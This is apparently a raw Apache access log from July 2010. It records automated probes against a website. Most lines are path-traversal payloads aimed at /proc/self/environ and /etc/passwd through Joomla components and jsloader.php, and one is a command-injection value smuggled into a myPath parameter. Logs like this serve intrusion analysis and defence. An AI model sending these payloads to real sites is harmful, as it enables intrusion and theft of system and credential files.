94.228.131.90 - - [27/Jul/2010:23:29:31 +0200] "GET /logs/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
94.228.131.90 - - [27/Jul/2010:23:29:31 +0200] "GET /logs/access_log%20%20/mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
94.228.131.90 - - [27/Jul/2010:23:29:31 +0200] "GET /mygallerybrowser.php?myPath=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 306 "-" "MaMa CaSpEr"
94.23.215.207 - - [27/Jul/2010:23:37:42 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:37:42 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:37:48 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:37:48 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:43:20 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:43:20 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:43:20 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:43:20 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:46:54 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:46:57 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:46:59 +0200] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:23:46:59 +0200] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
74.52.6.194 - - [27/Jul/2010:23:49:34 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:49:35 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:50:38 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
114.108.176.9 - - [27/Jul/2010:23:51:01 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
74.52.6.194 - - [27/Jul/2010:23:53:28 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:53:28 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:53:28 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:55:26 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:55:26 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:56:31 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
114.108.176.9 - - [27/Jul/2010:23:57:33 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
114.108.176.9 - - [27/Jul/2010:23:57:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [27/Jul/2010:23:57:35 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
74.52.6.194 - - [27/Jul/2010:23:57:35 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:57:35 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [27/Jul/2010:23:57:35 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:00:00:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
190.202.108.90 - - [28/Jul/2010:00:11:31 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
190.202.108.90 - - [28/Jul/2010:00:11:32 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
190.202.108.90 - - [28/Jul/2010:00:11:36 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
190.202.108.90 - - [28/Jul/2010:00:11:37 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
74.52.6.194 - - [28/Jul/2010:00:14:09 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:00:14:10 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:00:14:10 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:00:15:52 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:00:18:18 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
190.202.108.90 - - [28/Jul/2010:00:18:37 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
190.202.108.90 - - [28/Jul/2010:00:18:37 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
190.202.108.90 - - [28/Jul/2010:00:18:37 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
178.162.133.106 - - [28/Jul/2010:00:18:54 +0200] "GET /logs/access_log/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:00:18:54 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:00:18:55 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
190.202.108.90 - - [28/Jul/2010:00:19:13 +0200] "GET /logs/access_log//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
190.202.108.90 - - [28/Jul/2010:00:19:13 +0200] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
190.202.108.90 - - [28/Jul/2010:00:19:13 +0200] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
114.108.176.9 - - [28/Jul/2010:00:26:53 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:00:26:54 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:00:26:54 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
74.52.6.194 - - [28/Jul/2010:00:29:59 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:00:29:59 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:00:29:59 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
207.210.86.178 - - [28/Jul/2010:00:33:29 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 311 "-" "Mozilla/5.0"
207.210.86.178 - - [28/Jul/2010:00:33:29 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 295 "-" "Mozilla/5.0"
207.210.86.178 - - [28/Jul/2010:00:33:29 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 300 "-" "Mozilla/5.0"
114.108.176.9 - - [28/Jul/2010:00:40:01 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:00:40:02 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:00:40:02 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
216.18.201.205 - - [28/Jul/2010:00:59:14 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
216.18.201.205 - - [28/Jul/2010:01:09:51 +0200] "GET /logs/access_log/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.833"
216.18.201.205 - - [28/Jul/2010:01:09:51 +0200] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.833"
216.18.201.205 - - [28/Jul/2010:01:09:51 +0200] "GET /logs/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.833"
178.162.133.106 - - [28/Jul/2010:01:18:04 +0200] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:01:18:44 +0200] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
202.160.123.72 - - [28/Jul/2010:01:20:00 +0200] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
178.162.133.106 - - [28/Jul/2010:01:20:25 +0200] "GET /logs/access_log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:01:20:25 +0200] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.823"
178.162.133.106 - - [28/Jul/2010:01:20:25 +0200] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.823"
202.160.123.72 - - [28/Jul/2010:01:21:02 +0200] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
74.52.6.194 - - [28/Jul/2010:01:23:03 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:01:23:49 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:01:24:20 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:01:26:04 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
202.160.123.72 - - [28/Jul/2010:01:32:03 +0200] "GET /logs/access_log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:01:32:04 +0200] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:01:32:04 +0200] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
74.52.6.194 - - [28/Jul/2010:01:33:25 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:01:35:22 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:01:35:23 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:01:35:24 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:01:40:38 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
202.160.123.72 - - [28/Jul/2010:01:42:33 +0200] "GET /logs/access_log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:01:42:34 +0200] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
202.160.123.72 - - [28/Jul/2010:01:42:34 +0200] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
114.108.176.9 - - [28/Jul/2010:01:43:51 +0200] "GET /logs/access_log//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:01:43:52 +0200] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
114.108.176.9 - - [28/Jul/2010:01:43:52 +0200] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
87.98.217.83 - - [28/Jul/2010:01:57:16 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:01:57:20 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:01:59:57 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:01:59:57 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:02:05:52 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:02:05:53 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:02:05:53 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:02:05:54 +0200] "GET /logs/error_log//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:02:05:54 +0200] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.803"
87.98.217.83 - - [28/Jul/2010:02:05:54 +0200] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.803"
66.249.65.178 - - [28/Jul/2010:02:09:16 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.178 - - [28/Jul/2010:02:09:16 +0200] "GET /logs/access_log HTTP/1.1" 200 448670 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.121.191.5 - - [28/Jul/2010:02:16:46 +0200] "GET /logs//index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
174.121.191.5 - - [28/Jul/2010:02:16:46 +0200] "GET //index.php?option=com_jequoteform&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.52.6.194 - - [28/Jul/2010:02:43:05 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
114.108.176.9 - - [28/Jul/2010:02:43:10 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
